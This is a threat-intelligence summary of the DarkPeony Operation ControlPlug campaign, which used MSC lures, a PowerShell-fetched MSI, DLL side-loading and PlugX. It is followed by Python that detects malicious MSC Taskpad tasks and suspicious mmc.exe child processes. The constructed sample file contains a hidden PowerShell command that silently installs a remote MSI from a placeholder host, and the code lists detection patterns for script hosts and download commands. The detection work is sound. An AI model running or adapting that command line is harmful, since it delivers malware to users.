DarkPeony Carries Out Operation ControlPlug
The DarkPeony threat actor executed Operation ControlPlug against military and government agencies in Myanmar, the Philippines, Mongolia, and Serbia. The campaign began with MSC files (Microsoft Saved Console files, which open in Microsoft Management Console) that, when opened, displayed a screen prompting the user to click a link; clicking it executed a PowerShell script. The script downloaded and executed an MSI file from a remote server. The MSI contained three components: an EXE, a DLL, and a DAT file. The EXE is a legitimate program that is abused for DLL side-loading: it loads the attacker's DLL from its own directory, and that DLL decodes and executes the DAT file, which ultimately runs PlugX. The MSC files abused the Console Taskpad feature of Microsoft Management Console, which lets a console define tasks that run arbitrary command lines, so that the user was deceived into triggering the PowerShell script by clicking what looked like an ordinary link. The websites distributing the MSI files sat behind Cloudflare, which the actor used to control access: only the targeted organizations could reach the payload, obstructing researchers who tried to retrieve it.
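The two observable artifacts of the initial stage described above are (1) an MSC file whose Console Taskpad contains a task that runs a command line, and (2) mmc.exe spawning a script host or installer on the endpoint. The following Python is an added example written for this page, not code from the original report or from any vendor tooling. It scans a constructed sample MSC file for CommandLine tasks and flags process-creation events where mmc.exe is the parent of powershell.exe or similar. The element and attribute names in the sample (MMC_ConsoleFile, Taskpad, Task Type="CommandLine", CommandLine Command=... Arguments=...) are assumed from the Console Taskpad layout; the scanner only depends on finding a CommandLine element with Command and Arguments attributes, wherever it sits. The sample events and the URL example.invalid are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of a malicious .msc file (Microsoft Saved Console).
# The element layout is an assumption about the Console Taskpad format;
# the scanner below does not rely on the exact nesting.
SAMPLE_MSC = r"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Default">
  <Taskpad ListSize="Medium">
    <Tasks>
      <Task Type="CommandLine">
        <String Name="Name" ID="1">Open document</String>
        <CommandLine Command="powershell.exe"
                     Arguments="-w hidden -c &quot;Start-Process msiexec.exe -ArgumentList '/i https://example.invalid/update.msi /qn'&quot;"
                     Directory="" WindowState="Minimized"/>
      </Task>
      <Task Type="Navigation">
        <String Name="Name" ID="2">Local Users and Groups</String>
      </Task>
      <Task Type="CommandLine">
        <String Name="Name" ID="3">Event Viewer</String>
        <CommandLine Command="C:\Windows\System32\eventvwr.exe" Arguments="" Directory="" WindowState="Normal"/>
      </Task>
    </Tasks>
  </Taskpad>
</MMC_ConsoleFile>
"""

# Script hosts and installers an attacker would launch from a Taskpad task.
LOLBINS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec|certutil|bitsadmin|curl)(\.exe)?\b",
    re.I,
)
# Argument patterns that fetch remote content, decode payloads or hide the window.
SUSPICIOUS_ARGS = re.compile(
    r"(https?://|-e(nc(odedcommand)?)?\b|\biex\b|invoke-expression|download(string|file)"
    r"|-w(indowstyle)?\s+hidden|frombase64string)",
    re.I,
)


def scan_msc(xml_text):
    """Return one finding per Taskpad task that runs an external command line.

    Every CommandLine task is reported (severity "info") because a Taskpad
    running any program is worth a look; tasks that start a script host or
    whose arguments download/hide are raised to "high".
    """
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1].lower()  # drop any namespace
        if tag != "commandline":
            continue
        attrs = {k.lower(): v for k, v in elem.attrib.items()}
        command = attrs.get("command", "")
        arguments = attrs.get("arguments", "")
        reasons = []
        if LOLBINS.search(command):
            reasons.append("command is a script host / LOLBin")
        if SUSPICIOUS_ARGS.search(arguments):
            reasons.append("arguments fetch remote content, decode a payload or hide the window")
        findings.append({
            "command": command,
            "arguments": arguments,
            "severity": "high" if reasons else "info",
            "reasons": reasons,
        })
    return findings


# Constructed process-creation events (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"mmc.exe C:\Users\user\Downloads\report.msc"},
    {"ParentImage": r"C:\Windows\System32\mmc.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"Start-Process msiexec.exe ...\""},
    {"ParentImage": r"C:\Windows\System32\mmc.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"mmc.exe C:\Windows\System32\eventvwr.msc"},
]


def detect_mmc_child_process(events):
    """Flag events where mmc.exe is the parent of a script host or installer."""
    hits = []
    for ev in events:
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        child = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if parent == "mmc.exe" and LOLBINS.search(child):
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for f in scan_msc(SAMPLE_MSC):
        print(f["severity"], f["command"], f["arguments"], f["reasons"])
    for ev in detect_mmc_child_process(SAMPLE_EVENTS):
        print("ALERT mmc.exe ->", ev["Image"], ev["CommandLine"])
```

The file scan is the cheaper check to run at a mail or web gateway, because an MSC file with any CommandLine task is rare in legitimate traffic and the script-host and download patterns separate the Operation ControlPlug lure from an administrator's console shortcut. The process check is the endpoint-side fallback for MSC files that reached a user anyway; mmc.exe opening a nested console (the third sample event) is benign and is not flagged.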